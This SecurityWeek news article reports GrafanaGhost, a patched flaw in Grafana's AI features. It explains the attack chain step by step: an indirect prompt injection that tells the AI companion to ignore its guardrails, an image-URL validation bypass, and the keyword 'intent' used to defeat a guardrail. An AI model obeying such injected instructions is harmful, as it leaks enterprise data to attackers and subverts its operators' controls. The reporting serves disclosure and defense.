GrafanaGhost: Attackers Can Abuse Grafana to Leak Enterprise Data
GrafanaGhost vulnerability allows attackers to bypass Grafana AI safeguards and exfiltrate enterprise data via prompt
Summary
Noma Security discovered GrafanaGhost, a vulnerability in Grafana's AI components that allows attackers to bypass client-side protections and exfiltrate sensitive enterprise data without user interaction. By crafting malicious prompts with indirect injection techniques and exploiting flaws in image URL validation, attackers can redirect Grafana's AI to leak data to external servers. Grafana has already patched the issue following responsible disclosure.
Full text
A vulnerability in how Grafana’s AI components process information could allow attackers to bypass the application’s safeguards and leak enterprise information, new research from Noma Security shows. An open source analytics and visualization application that ingests data from various sources, Grafana often has broad access to enterprise data, including financial metrics, infrastructure, customer information, and telemetry. The newly discovered vulnerability, named GrafanaGhost, allows attackers to bypass client-side protections and security guardrails and link private data to external servers, exposing sensitive information in the background without user interaction. An attacker can exploit the weakness by targeting Grafana’s AI-based capabilities when a user interacts with an entry log. In the background, a malicious prompt triggers the issue, turning Grafana into the exfiltration vessel. To mount the attack, a threat actor needs to craft a path pointing to external resources. When processed by Grafana, the entry log provides the attacker with access to the enterprise environment. Next, the attacker uses an indirect prompt hidden in the external context, instructing Grafana’s AI companion to ignore its guardrails and render an external image, forcing the system to acknowledge an external URL.Advertisement. Scroll to continue reading. When attempting to render the image, the AI companion makes a request to the attacker’s server, and the victim’s data is sent along as a URL parameter. “The data leaks the moment the system tries to display the image,” Noma says. The issue, the cybersecurity firm discovered, was that the attacker could “fake the path of any company using Grafana” by guessing the data structure and model. Furthermore, an attacker could use a location where prompts would be saved within the application’s data store. From there, the attacker could abuse Grafana to exfiltrate data via image tags by crafting their prompts accordingly. While Grafana has protections in place that prevent the loading of images from external domains, a flaw in a function that validates image URLs could be exploited to bypass the protection. The AI model also has guardrails in place to prevent the injection of prompts that contain image markdown, but Noma discovered that the keyword “intent” could be used to bypass the protection and signal to the model that the instruction was legitimate. “Chaining these discoveries together, we achieved automatic data exfiltration with zero user interaction. Data exfiltration occurs entirely in the background. To the data team, DevSecOps, or CISO, it looks like a typical day of data visualization,” Noma notes, adding that Grafana addressed the weaknesses immediately after being notified. According to BeyondTrust deputy CISO Bradley Smith, the use of indirect prompt injections to exfiltrate data via rendered content is a well-known attack vector, and the exploitability against a hardened Grafana deployment is less clear. “The practical exploitability depends heavily on deployment specifics; whether AI features are enabled, whether egress controls are in place, and how the environment handles external data ingestion. This isn’t a universal bypass of Grafana; it’s a demonstration of what can happen when AI components process untrusted input without sufficient architectural controls around them,” Smith said. According to Acalvio CEO Ram Varadarajan, GrafanaGhost illustrates that the broad adoption of AI has shifted defenses beyond the application layer, requiring network-level URL blocking and hardening AI against prompt injection. “Ultimately, this exploit proves that perimeter controls are insufficient. The only way to secure AI-driven tooling is to shift from monitoring what an agent is told to performing runtime behavioral monitoring of what it actually does,” Varadarajan said. Related: Google DeepMind Researchers Map Web Attacks Against AI Agents Related: Why Agentic AI Systems Need Better Governance – Lessons from OpenClaw Related: AI, APIs and DDoS Collide in New Era of Coordinated Cyberattacks Related: Vulnerability Allowed Hijacking Chrome’s Gemini Live AI Assistant Written By Ionut Arghire Ionut Arghire is an international correspondent for SecurityWeek. More from Ionut Arghire North Korean Hackers Target High-Profile Node.js MaintainersFortinet Rushes Emergency Fixes for Exploited Zero-DayEuropean Commission Confirms Data Breach Linked to Trivy Supply Chain AttackTrueConf Zero-Day Exploited in Asian Government AttacksCritical ShareFile Flaws Lead to Unauthenticated RCEReact2Shell Exploited in Large-Scale Credential Harvesting CampaignNorth Korean Hackers Drain $285 Million From Drift in 10 SecondsCisco Patches Critical and High-Severity Vulnerabilities Latest News Webinar Today: Why Automated Pentesting Alone Is Not EnoughGPUBreach: Root Shell Access Achieved via GPU Rowhammer Attack Medusa Ransomware Fast to Exploit Vulnerabilities, Breached SystemsGerman Police Unmask REvil Ransomware LeaderWhite House Seeks to Slash CISA Funding by $707 MillionWynn Resorts Says 21,000 Employees Affected by ShinyHunters HackGoogle DeepMind Researchers Map Web Attacks Against AI AgentsGuardarian Users Targeted With Malicious Strapi NPM Packages Trending Daily Briefing Newsletter Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts. Webinar: Securing Fragile OT in an Exposed World March 10, 2026 Get a candid look at the current OT threat landscape as we move past "doom and gloom" to discuss the mechanics of modern OT exposure. Register Webinar: Why Automated Pentesting Alone Is Not Enough April 7, 2026 Join our live diagnostic session to expose hidden coverage gaps and shift from flawed tool-level evaluations to a comprehensive, program-level validation discipline. Register People on the MoveScott Goree has been appointed Senior Vice President of Channel and Alliances at Delinea.Kai has named Nick Degnan as Chief Revenue Officer.Joe Sullivan has been appointed Strategic Advisor at cloud security firm Upwind.More People On The MoveExpert Insights The Next Cybersecurity Crisis Isn’t Breaches—It’s Data You Can’t Trust Data integrity shouldn’t be seen only through the prism of a technical concern but also as a leadership issue. (Steve Durbin) Why Agentic AI Systems Need Better Governance – Lessons from OpenClaw Agentic AI platforms are shifting from passive recommendation tools to autonomous action-takers with real system access, (Etay Maor) The Human IOC: Why Security Professionals Struggle with Social Vetting Applying SOC-level rigor to the rumors, politics, and 'human intel' can make or break a security team. (Joshua Goldfarb) How to 10x Your Vulnerability Management Program in the Agentic Era The evolution of vulnerability management in the agentic era is characterized by continuous telemetry, contextual prioritization and the ultimate goal of agentic remediation. (Nadir Izrael) SIM Swaps Expose a Critical Flaw in Identity Security SIM swap attacks exploit misplaced trust in phone numbers and human processes to bypass authentication controls and seize high-value accounts. (Torsten George) Flipboard Reddit Whatsapp Whatsapp Email
Indicators of Compromise
- malware — GrafanaGhost